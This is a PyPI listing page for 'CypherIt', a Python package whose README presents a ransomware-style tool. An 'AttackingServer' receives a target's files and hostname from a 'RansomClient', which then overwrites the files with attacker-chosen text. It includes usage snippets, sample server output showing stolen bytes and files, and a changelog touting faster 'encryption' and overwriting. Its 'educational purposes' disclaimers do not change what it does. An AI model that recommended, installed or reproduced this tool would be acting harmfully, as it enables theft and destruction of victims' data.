CypherIt


NameCypherIt JSON
Version 0.0.6 PyPI version JSON
download
home_page
SummaryRenames all files and writes it with what ever you want. For more information check out my website:https://pypi.org/project/CypherIt/
upload_time2022-12-10 00:17:16
maintainer
docs_urlNone
authorFawaz Bashiru
requires_python
licenseMIT
keywords cypherit
VCS
bugtrack_url
requirements No requirements were recorded.
Travis-CI No Travis.
coveralls test coverage No coveralls.
            CypherIt
========

CypherIt is an intelligent tool which renames all the files to a txt file in a binder.You can write what ever you want.

All the files of the target will be saved in your directory and you can do what ever you want. The name of the directory is the targets hostname

Inspired by:
==========
B.I.GG. He had this wonderful idea. BIG thanks to him

HOW DOES CYPHERIT WORK
======================

If you are familiar to my style of packages. You already know how simple it is

First of all create a server:

Server
------

````python
import CypherIt as ci

ip, port = "127.0.0.1", 1234

server = ci.AttackingServer(ip, port)
server.start()
````

Client
------

````python
import CypherIt as ci

ip, port, path, text = "127.0.0.1", 1234, r"C:\\test", "ALI THE MASTER"
# You have to specify the path because this was just build for educational purposes. So please do not use it for bad thinks

data = ci.RansomClient(ip, port, path, text)
data.start()
````

Output of Server
--------------
````
Waiting for connection....
Connection has been established with ('192.168.0.73', 64328)
98_304 Bytes has been sent to the server
"_" stands for point
18 files have been saved to your directory
Waiting for connection....
````


You always have to run the server first and then the client.

The hostname of the target will be sent to your server

A Directory with the hostname of the target will be created.

All the data of target will be stored in that directory

Additional
=========
* PLEASE DO NOT HACK SOMEONE FOREIGN
* If you see "Connection has been established" at the server than you have to wait a bit for the data to arrive

Change Log
==========

0.0.1 (29/11/2022)
-----------------
- First Release

0.0.2 (29/11/2022)
-----------------
- Fix

0.0.3 (03/12/2022)
-----------------
- More intelligent
- Accurate connection
- Folder in path can also be written to a txt file
- file in the path will be overwritten even folders in the path
- Faster overwriting (ps. Still slow but I am working on it)
- Path error fixed

0.0.4 (04/12/2022)
------------------
- Better "encryption"
- Better Server
- MemoryError fixed
- Capacity of bytes has been increased to 8kb
- Python Package name fix

0.0.5 (07/12/2022)
-------------------
- Way faster encryption
- Better Code
- New function "all_data"

0.0.6 (10/12/2022)
-------------------
- New function "AI_check" this AI checks in every directory
- New output
- Bytes of target will be in the output
- Change directory more accurate
- Number of target files will be displayed at the output of the target

            

Raw data

            {
    "_id": null,
    "home_page": "",
    "name": "CypherIt",
    "maintainer": "",
    "docs_url": null,
    "requires_python": "",
    "maintainer_email": "",
    "keywords": "CypherIT",
    "author": "Fawaz Bashiru",
    "author_email": "fawazbashiru@gmail.com",
    "download_url": "https://files.pythonhosted.org/packages/e2/fa/bc5f172960d866ff1927efdbd0fdcc61bb1c1b99428a34603f3146e7f7f8/CypherIt-0.0.6.tar.gz",
    "platform": null,
    "description": "CypherIt\r\n========\r\n\r\nCypherIt is an intelligent tool which renames all the files to a txt file in a binder.You can write what ever you want.\r\n\r\nAll the files of the target will be saved in your directory and you can do what ever you want. The name of the directory is the targets hostname\r\n\r\nInspired by:\r\n==========\r\nB.I.GG. He had this wonderful idea. BIG thanks to him\r\n\r\nHOW DOES CYPHERIT WORK\r\n======================\r\n\r\nIf you are familiar to my style of packages. You already know how simple it is\r\n\r\nFirst of all create a server:\r\n\r\nServer\r\n------\r\n\r\n````python\r\nimport CypherIt as ci\r\n\r\nip, port = \"127.0.0.1\", 1234\r\n\r\nserver = ci.AttackingServer(ip, port)\r\nserver.start()\r\n````\r\n\r\nClient\r\n------\r\n\r\n````python\r\nimport CypherIt as ci\r\n\r\nip, port, path, text = \"127.0.0.1\", 1234, r\"C:\\\\test\", \"ALI THE MASTER\"\r\n# You have to specify the path because this was just build for educational purposes. So please do not use it for bad thinks\r\n\r\ndata = ci.RansomClient(ip, port, path, text)\r\ndata.start()\r\n````\r\n\r\nOutput of Server\r\n--------------\r\n````\r\nWaiting for connection....\r\nConnection has been established with ('192.168.0.73', 64328)\r\n98_304 Bytes has been sent to the server\r\n\"_\" stands for point\r\n18 files have been saved to your directory\r\nWaiting for connection....\r\n````\r\n\r\n\r\nYou always have to run the server first and then the client.\r\n\r\nThe hostname of the target will be sent to your server\r\n\r\nA Directory with the hostname of the target will be created.\r\n\r\nAll the data of target will be stored in that directory\r\n\r\nAdditional\r\n=========\r\n* PLEASE DO NOT HACK SOMEONE FOREIGN\r\n* If you see \"Connection has been established\" at the server than you have to wait a bit for the data to arrive\r\n\r\nChange Log\r\n==========\r\n\r\n0.0.1 (29/11/2022)\r\n-----------------\r\n- First Release\r\n\r\n0.0.2 (29/11/2022)\r\n-----------------\r\n- Fix\r\n\r\n0.0.3 (03/12/2022)\r\n-----------------\r\n- More intelligent\r\n- Accurate connection\r\n- Folder in path can also be written to a txt file\r\n- file in the path will be overwritten even folders in the path\r\n- Faster overwriting (ps. Still slow but I am working on it)\r\n- Path error fixed\r\n\r\n0.0.4 (04/12/2022)\r\n------------------\r\n- Better \"encryption\"\r\n- Better Server\r\n- MemoryError fixed\r\n- Capacity of bytes has been increased to 8kb\r\n- Python Package name fix\r\n\r\n0.0.5 (07/12/2022)\r\n-------------------\r\n- Way faster encryption\r\n- Better Code\r\n- New function \"all_data\"\r\n\r\n0.0.6 (10/12/2022)\r\n-------------------\r\n- New function \"AI_check\" this AI checks in every directory\r\n- New output\r\n- Bytes of target will be in the output\r\n- Change directory more accurate\r\n- Number of target files will be displayed at the output of the target\r\n",
    "bugtrack_url": null,
    "license": "MIT",
    "summary": "Renames all files and writes it with what ever you want. For more information check out my website:https://pypi.org/project/CypherIt/",
    "version": "0.0.6",
    "split_keywords": [
        "cypherit"
    ],
    "urls": [
        {
            "comment_text": "",
            "digests": {
                "md5": "efd0c914a43beec7c0cf4b4c1aeb5625",
                "sha256": "74ad053e9490140e0ad11efc169b048ef8f0122ad720531fae89849353ece064"
            },
            "downloads": -1,
            "filename": "CypherIt-0.0.6.tar.gz",
            "has_sig": false,
            "md5_digest": "efd0c914a43beec7c0cf4b4c1aeb5625",
            "packagetype": "sdist",
            "python_version": "source",
            "requires_python": null,
            "size": 5305,
            "upload_time": "2022-12-10T00:17:16",
            "upload_time_iso_8601": "2022-12-10T00:17:16.708213Z",
            "url": "https://files.pythonhosted.org/packages/e2/fa/bc5f172960d866ff1927efdbd0fdcc61bb1c1b99428a34603f3146e7f7f8/CypherIt-0.0.6.tar.gz",
            "yanked": false,
            "yanked_reason": null
        }
    ],
    "upload_time": "2022-12-10 00:17:16",
    "github": false,
    "gitlab": false,
    "bitbucket": false,
    "lcname": "cypherit"
}
        
Elapsed time: 0.03979s